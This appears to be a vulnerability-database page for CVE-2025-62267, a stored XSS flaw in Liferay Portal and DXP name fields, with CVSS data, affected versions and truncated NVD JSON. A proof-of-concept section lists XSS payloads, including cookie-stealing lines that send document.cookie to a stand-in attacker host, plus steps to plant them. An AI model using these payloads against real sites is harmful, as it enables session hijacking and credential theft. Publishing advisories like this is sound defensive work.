Security Vulnerability Report
CVE-2025-62267 CVSS 6.1 MEDIUM

CVE-2025-62267

Published: 2025-10-31 19:15:51
Last Modified: 2025-11-10 17:04:42

Description

Multiple cross-site scripting (XSS) vulnerabilities in web content template’s select structure page in Liferay Portal 7.4.3.35 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, 7.4 update 35 through update 92 allow remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user’s (1) First Name, (2) Middle Name, or (3) Last Name text field.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.4:update35:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.4:update36:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.4:update37:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.4:update38:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.4.3.35 - 7.4.3.111
Liferay DXP 2023.Q4.0 - 2023.Q4.10
Liferay DXP 2023.Q3.1 - 2023.Q3.10
Liferay 7.4 Update 35 - Update 92

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
// CVE-2025-62267 PoC - Stored XSS via User Name Fields
// Payload for First Name, Middle Name, or Last Name field:

// Basic XSS payload
<script>alert(document.cookie)</script>

// Cookie stealing payload
<img src=x onerror="this.src='https://attacker.com/steal?c='+document.cookie">

// Session hijacking payload
<script>
fetch('https://attacker.com/log?cookie='+btoa(document.cookie));
</script>

// Steps to exploit:
// 1. Navigate to Liferay Portal user profile settings
// 2. Inject XSS payload into First Name/Middle Name/Last Name field
// 3. Save the profile changes
// 4. Wait for admin or other user to view content template page
// 5. XSS payload executes in victim's browser context

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62267", "sourceIdentifier": "[email protected]", "published": "2025-10-31T19:15:50.610", "lastModified": "2025-11-10T17:04:42.033", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple cross-site scripting (XSS) vulnerabilities in web content template’s select structure page in Liferay Portal 7.4.3.35 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, 7.4 update 35 through update 92 allow remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user’s (1) First Name, (2) Middle Name, or (3) Last Name text field."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E19E344-92B4-4B46-BD89-25EC7191972C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update35:*:*:*:*:*:*", "matchCriteriaId": "341D1157-8118-4BD3-A902-36E90E066706"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update36:*:*:*:*:*:*", "matchCriteriaId": "1AB71307-7EAA-436A-9CBC-5A94F034FB48"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update37:*:*:*:*:*:*", "matchCriteriaId": "9446B3A5-6647-416C-92AF-7B6E0E929765"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update38:*:*:*:*:*:*", "matchCriteriaId": "06386C7A-CAA1-4FC4-9182-5A66342FB903"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update39:*:*:*:*:*:*", "matchCriteriaId": "8C84B701-B9A1-43D0-AF0C-30EDBD24CF90"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:liferay:digital_experience_platform:7.4:update40:*:*:*:*:*:*", "matchCriteriaId": "BA9AF651-D118-4437-B400-531B26BF6801"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update41:*:*:*:*:*:*", "matchCriteriaId": "2B256485-E289-4092-B45B-835DE12625B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update42:*:*:*:*:*:*", "matchCriteriaId": "119B54BD-75F4-46A4-A57D-16CFF4E12CEB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update43:*:*:*:*:*:*", "matchCriteriaId": "A3382E2D-A414-40A1-A330-619859756A36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update44:*:*:*:*:*:*", "matchCriteriaId": "2E07B750-55B6-4DB6-B02B-216C2F5505A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update45:*:*:*:*:*:*", "matchCriteriaId": "B921E670-480F-4793-A636-3855A1654908"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update46: ... (truncated)